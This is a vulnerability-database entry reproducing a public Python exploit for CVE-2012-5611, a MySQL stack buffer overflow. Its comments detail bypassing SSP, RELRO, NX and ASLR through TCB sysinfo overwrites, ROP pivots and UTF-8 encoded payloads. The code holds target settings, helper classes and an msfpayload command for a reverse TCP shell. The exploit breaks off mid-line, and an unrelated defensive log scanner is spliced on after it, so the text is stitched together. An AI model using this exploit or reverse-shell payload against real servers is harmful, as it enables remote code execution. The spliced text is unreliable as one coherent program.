MySQL Stack Buffer Overflow Linux x86 32bits (bypass SSP/RELRO/NX/ASLR)

2012-12-28T00:00:00
ID SSV:60545
Type seebug
Reporter Root
Modified 2012-12-28T00:00:00

Description

No description provided by source.

#!/usr/bin/env python
# 27/12/12 - status : public release

# CVE-2012-5611 ( https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5611 )
# -------- Author   : ipv
# -------- Impact   : high
# -------- URL		: http://blog.ring0.me/
# -------- Description
#
# The code below is linked to CVE-2012-5611, a flaw discovered by kingcope.
# MySQL server is prone to a remote buffer overflow that allows a remote
# authenticated attacker to reach code execution in the context of the user
# running the MySQL instance (default: mysql user).

# The vulnerability resides in the acl_get function, called when an
# authenticated user requests a privileged account management statement.
# MySQL fails to verify the length of the user-controlled "db" parameter.
#
# 	end=strmov((tmp_db=strmov(strmov(key, ip ? ip : "")+1,user)+1),db);
#
# The destination address of the strcpy is located on an mmapped page
# dedicated to the user connection, which allows a buffer overflow into
# adjacent memory.
#
# Different attack vectors may be possible depending on the system.
# FYI, Microsoft Windows versions are vulnerable as well.
#---------------------------------------------------------
# To bypass ASLR/SSP/RELRO/NX:
#------------------------------------------------------------------------------
# I take advantage of the threading model. This means MySQL uses only one
# address space for all MySQL resources (data structures, network
# management, sessions, etc.).
# To bypass SSP, I overwrite the sysinfo handler (pointing to the sysenter
# vDSO) of the TCB structure located higher up on the stack.
# The ROP chain aims to pivot to our controlled stack data. At this point,
# if we overwrite the sysinfo handler, we cannot use ret2libc and/or the GOT
# dereferencing technique, since the libc API relies on the sysinfo pointer
# to call sysenter.
#
# So to accomplish code exec, afaik, you have two ways:
#	1 - Extract the sysinfo of an intact TCB and use it as a proxy call
#	(or you can restore the first sysinfo after modifying the GOT)
#		-> I use it for the Red Hat exploit (no SSP on Red Hat/CentOS);
#		-> this allows us to bypass RELRO/ASLR/NX
#	2 - Find an int 0x80 / sysenter gadget in .text
#	(a bad instruction follows the int 0x80 gadget, so you have a one-shot
#	chance to get code exec; so I advise you to find a sysenter)
#		- I use sysenter for Ubuntu 10.04 self-compiled with SSP.
#		- this allows us to bypass RELRO/SSP/ASLR/NX
# 
# Shellcodes are alphanumeric-mixed (skylined's tool ftw). The exploit
# bypasses SSP/ASLR/NX.
#
#---------------------------------------------------------
# UTF-8 and ROP chains limitation :
#---------------------------------------------------------
# MySQL schema object names restrict a database name to alphanumeric
# characters (and $ _).
# To bypass this, I use UTF-8 encoding with bytes lower than 0x80. Encoding is
# done by MySQL when the database name is quoted with `` (mandatory to
# successfully exploit the target). Yes, the devil is in the details.

# MySQL reference : https://dev.mysql.com/doc/refman/5.1/en/identifiers.html
#
# For any comments/job offer, mail me : ipv _at_ consortium-of-pwners . net

########################################################################
# Modules
#

import pymysql
import sys
import struct
import os, socket

########################################################################
# Authentication options 
#

MYSQL_USER = "test"
MYSQL_PASSWORD = ""

#MYSQL_HOST = "192.168.130.147"
MYSQL_HOST = "192.168.130.129"
MYSQL_PORT = 3306

########################################################################
# Helper
# 

# Pack an integer as a little-endian dword; strings are passed through as-is.
def _x(v):
	if isinstance(v, str):
		return v
	return struct.pack("<I", v)

# TCB is used when we face SSP
class _TCB:
	tcb = 0 # updated later by a ret gadget
	dtv = "BBBB"
	_self = "CCCC"
	multiple_threads= "DDDD"
	sysinfo = 0 # SEIP - updated later by stack pivot gadget 
	stack_guard = "AAAA"
	pointer_guard = 0 # updated later by a pop pop ret gadget

# base class
class rc_base:
	eip_off = 0
	align_payload = 0
	align_stack = 2048
	retsled = ""
	safe_overwrite = ""
	pivot = ""
	pppr = ""
	ppr = ""
	
	# ./msf/msfpayload linux/x86/shell_reverse_tcp2 LHOST=192.168.130.1 LPORT=4444 R | ./alpha2 esp
	# XXX - CHANGEME !
	sc_rev_tcp =
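A defender-side check for the two properties the header comments above rely on (a `db` identifier far beyond MySQL's 64-character limit, and bytes that only a backtick-quoted name can carry) can be run over the MySQL general query log until the server is patched. This is an added example, not part of ipv's exploit; it assumes the 5.1 general-log line layout and that GRANT/REVOKE are the account management statements carrying the db name.

```python
import re
# MySQL's documented limit for a database identifier (characters).
MAX_IDENT_LEN = 64
# Assumption: GRANT/REVOKE are the account management statements reaching acl_get.
PRIV_STMT = re.compile(r'^\s*(GRANT|REVOKE)\b', re.IGNORECASE)
# Backtick-quoted database part of "ON `db`.*"; a literal backtick is doubled.
QUOTED_DB = re.compile(r'\bON\s+`((?:[^`]|``)+)`\s*\.', re.IGNORECASE)
# General query log line: optional timestamp, connection id, "Query", statement.
LOG_LINE = re.compile(r'^\s*(?:\d{6}\s+\d{1,2}:\d{2}:\d{2}\s+)?(\d+)\s+Query\s+(.*)$')

def inspect_statement(sql):
    """Return the reasons a statement carries an over-long or binary db name."""
    if not PRIV_STMT.match(sql):
        return []
    m = QUOTED_DB.search(sql)
    if not m:
        return []  # unquoted names are already limited to [0-9A-Za-z$_]
    db = m.group(1).replace('``', '`')
    reasons = []
    if len(db) > MAX_IDENT_LEN:
        reasons.append('db name is %d chars, limit is %d' % (len(db), MAX_IDENT_LEN))
    if any(ord(c) < 0x20 or ord(c) == 0x7f for c in db):
        reasons.append('db name contains control characters')
    return reasons

def scan_general_log(lines):
    """Return (connection id, reasons, statement prefix) for each suspicious line."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m:
            reasons = inspect_statement(m.group(2))
            if reasons:
                findings.append((int(m.group(1)), reasons, m.group(2)[:40]))
    return findings

# Constructed sample log lines (not a real capture); the third mimics the
# over-long quoted db name sent in the exploit's GRANT statement.
SAMPLE_LOG = [
    "121228 10:12:33\t    5 Connect\ttest@192.168.130.1 on ",
    "121228 10:12:33\t    5 Query\tSELECT @@version",
    "\t\t    5 Query\tGRANT FILE ON `" + "A" * 600 + "`.* TO 'test'@'%'",
    "121228 10:12:34\t    6 Query\tGRANT SELECT ON `app_db`.* TO 'app'@'localhost'",
    "121228 10:12:35\t    6 Query\tGRANT SELECT ON `ab\x01cd`.* TO 'app'@'localhost'",
]

if __name__ == '__main__':
    for cid, reasons, stmt in scan_general_log(SAMPLE_LOG):
        print('conn %d: %s -- %s...' % (cid, '; '.join(reasons), stmt))
```

Legitimate quoted names with spaces, hyphens or non-ASCII letters are not flagged; only the length limit and control bytes are, so the rule stays quiet on normal GRANT traffic.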